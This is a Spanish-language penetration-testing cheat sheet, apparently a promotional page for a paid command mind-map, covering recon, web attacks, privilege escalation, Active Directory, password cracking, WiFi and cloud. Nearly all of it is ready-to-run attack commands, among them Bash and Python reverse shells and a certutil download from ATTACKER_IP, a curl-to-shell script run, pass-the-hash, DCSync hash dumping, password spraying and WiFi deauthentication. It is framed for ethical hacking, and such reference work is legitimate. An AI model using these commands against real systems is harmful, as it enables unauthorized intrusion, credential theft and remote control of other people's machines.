# Reconocimiento
La recopilación de información es la base de todo pentest. Comienza con reconocimiento pasivo y luego pasa al escaneo activo.
Nmap — Descubrimiento de Red
nmap -sC -sV -oA scan_results TARGET_IP
Scripts por defecto + detección de versiones con salida en todos los formatos
nmap -p- -T4 --min-rate=1000 TARGET_IP
Escaneo completo de puertos TCP — modo rápido
nmap -sU --top-ports 200 TARGET_IP
Escaneo UDP en los 200 puertos más comunes
nmap --script vuln TARGET_IP
Ejecutar todos los scripts de detección de vulnerabilidades
Enumeración de Subdominios y DNS
subfinder -d TARGET_DOMAIN -o subdomains.txt
Enumeración pasiva de subdominios
amass enum -d TARGET_DOMAIN -o amass_results.txt
Enumeración profunda de subdominios con OSINT
dig axfr @DNS_SERVER TARGET_DOMAIN
Intento de transferencia de zona DNS
Fuerza Bruta de Directorios y Archivos
feroxbuster -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js
Fuerza bruta recursiva rápida de directorios con extensiones
gobuster dir -u https://TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
Fuerza bruta clásica de directorios con 50 hilos
# Hacking de Aplicaciones Web
Prueba las vulnerabilidades del OWASP Top 10: SQLi, XSS, SSRF, IDOR, bypass de autenticación y más.
Inyección SQL
sqlmap -u "https://TARGET/page?id=1" --dbs --batch
Detección automática de SQLi + enumeración de bases de datos
sqlmap -u "https://TARGET/page?id=1" -D dbname --tables --batch
Enumerar tablas en una base de datos específica
sqlmap -r request.txt --level 5 --risk 3 --batch
SQLi desde petición Burp guardada con nivel máximo
XSS (Cross-Site Scripting)
dalfox url "https://TARGET/search?q=FUZZ" -b YOUR_CALLBACK
Escáner automático de XSS con callback para XSS ciego
SSRF y LFI
ffuf -u "https://TARGET/fetch?url=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/ssrf.txt -mr "root:"
Fuzzing de SSRF con coincidencia de respuesta
ffuf -u "https://TARGET/page?file=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -fc 404
Fuzzing de Inclusión Local de Archivos
Esenciales de Burp Suite
curl -x http://127.0.0.1:8080 -k https://TARGET
Redirigir tráfico a través del proxy Burp
# Servicios de Red
Protocolos y servicios comunes en pentests: SMB, FTP, SSH, HTTP, SNMP.
Enumeración SMB
smbclient -L //TARGET_IP -N
Listar recursos compartidos SMB de forma anónima
enum4linux -a TARGET_IP
Enumeración completa SMB/NetBIOS
crackmapexec smb TARGET_IP -u '' -p '' --shares
Enumerar recursos con sesión nula
FTP
ftp TARGET_IP # Probar anonymous:anonymous
Conectar con acceso anónimo
SNMP
snmpwalk -v2c -c public TARGET_IP
Recorrer árbol SNMP con community string "public"
# Escalada de Privilegios Linux
Después de obtener una shell, escala a root. Revisa SUID, capabilities, cron jobs y exploits de kernel.
Scripts de Enumeración
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
Ejecutar LinPEAS para enumeración automatizada de privesc
Binarios SUID
find / -perm -4000 -type f 2>/dev/null
Encontrar todos los binarios SUID — cruzar con GTFOBins
Capabilities
getcap -r / 2>/dev/null
Listar archivos con capabilities de Linux
Cron Jobs
cat /etc/crontab && ls -la /etc/cron.* && crontab -l
Revisar todas las tareas cron programadas
Mala Configuración de Sudo
sudo -l
Listar comandos que el usuario actual puede ejecutar con sudo
/etc/passwd con Escritura
openssl passwd -1 -salt hacker password123
Generar hash de contraseña para inyectar en /etc/passwd si tiene permisos de escritura
# Escalada de Privilegios Windows
Escala de usuario con pocos privilegios a SYSTEM. Suplantación de tokens, abuso de servicios, rutas sin comillas.
Enumeración
winPEASany.exe quiet fast searchfast
Ejecutar WinPEAS para enumeración automatizada de privesc en Windows
whoami /priv
Revisar privilegios actuales — buscar SeImpersonate, SeBackup
Suplantación de Tokens
.\GodPotato.exe -cmd "cmd /c whoami"
Explotar SeImpersonatePrivilege (Windows Server 2019+)
Rutas de Servicio sin Comillas
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
Encontrar servicios con rutas sin comillas fuera de directorios del sistema
# Active Directory
Pentesting AD: enumerar usuarios, kerberoasting, AS-REP roasting, pass-the-hash, DCSync.
Enumeración
bloodhound-python -c All -d DOMAIN.LOCAL -u USER -p PASS -ns DC_IP
Recopilar datos de BloodHound de forma remota
ldapsearch -x -H ldap://DC_IP -D "USER@DOMAIN" -w PASS -b "DC=domain,DC=local" "(objectClass=user)" sAMAccountName
Enumeración de usuarios por LDAP
Kerberoasting
impacket-GetUserSPNs DOMAIN/USER:PASS -dc-ip DC_IP -request -outputfile kerberoast.txt
Solicitar tickets TGS para cracking offline
AS-REP Roasting
impacket-GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip DC_IP -no-pass -outputfile asrep.txt
Encontrar cuentas sin pre-autenticación
Pass-the-Hash
impacket-psexec DOMAIN/USER@TARGET_IP -hashes :NTLM_HASH
Obtener shell usando hash NTLM (sin contraseña)
DCSync
impacket-secretsdump DOMAIN/USER:PASS@DC_IP -just-dc-ntlm
Volcar todos los hashes NTLM del dominio vía DCSync
# Ataques de Contraseñas
Crackear hashes, fuerza bruta en servicios y pulverización de credenciales en la red.
Cracking de Hashes
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule
Crackear hashes NTLM con reglas
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Crackear hashes con John the Ripper
Fuerza Bruta Online
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET_IP ssh -t 4
Fuerza bruta SSH (4 hilos para evitar bloqueo)
Pulverización de Contraseñas
crackmapexec smb TARGET_IP -u users.txt -p 'Season2026!' --continue-on-success
Pulverización de contraseñas SMB en lista de usuarios
# Post-Explotación
Después de obtener acceso: establecer persistencia, pivotar, exfiltrar datos.
Transferencia de Archivos
python3 -m http.server 8080
Servidor HTTP rápido para transferir archivos
certutil -urlcache -split -f http://ATTACKER_IP:8080/file.exe C:\Temp\file.exe
Descargar archivo en el objetivo Windows
Reverse Shells
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Reverse shell en Bash
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Reverse shell en Python
Mejorar Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
Mejorar a TTY interactivo
Pivoting
chisel server -p 8000 --reverse # En atacante
chisel client ATTACKER_IP:8000 R:socks # En objetivo
Configurar proxy SOCKS a través de host comprometido
# Ataques Inalámbricos
Pentesting WiFi: capturar handshakes, crackear WPA2, puntos de acceso falsos.
airmon-ng start wlan0
Activar modo monitor
airodump-ng wlan0mon
Escanear redes inalámbricas cercanas
airodump-ng -c CHANNEL --bssid BSSID -w capture wlan0mon
Capturar paquetes de la red objetivo
aireplay-ng -0 5 -a BSSID wlan0mon
Ataque deauth para capturar handshake WPA
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
Crackear handshake WPA2 offline
# Cloud y Kubernetes
Enumerar activos en la nube, explotar malas configuraciones en AWS, Azure, GCP y Kubernetes.
AWS
aws sts get-caller-identity
Verificar identidad AWS actual
aws s3 ls s3://BUCKET_NAME --no-sign-request
Listar contenido de bucket S3 público
Kubernetes
kubectl get pods --all-namespaces
Listar todos los pods en todos los namespaces
kubectl auth can-i --list
Verificar permisos actuales
📚 Recursos Relacionados
- Glosario de Pentesting — 60+ términos de ciberseguridad definidos para hackers éticos
- Cómo Empezar en Pentesting — Guía paso a paso con metodología y herramientas
¿Quieres 11.600+ comandos en un mapa mental interactivo?
Este cheatsheet muestra una fracción de lo que ofrece Pentest Mindmap. Obtén 32 categorías, búsqueda instantánea y copia en un clic — organizado como un hermoso mapa mental interactivo.
Prueba Gratis 7 Días →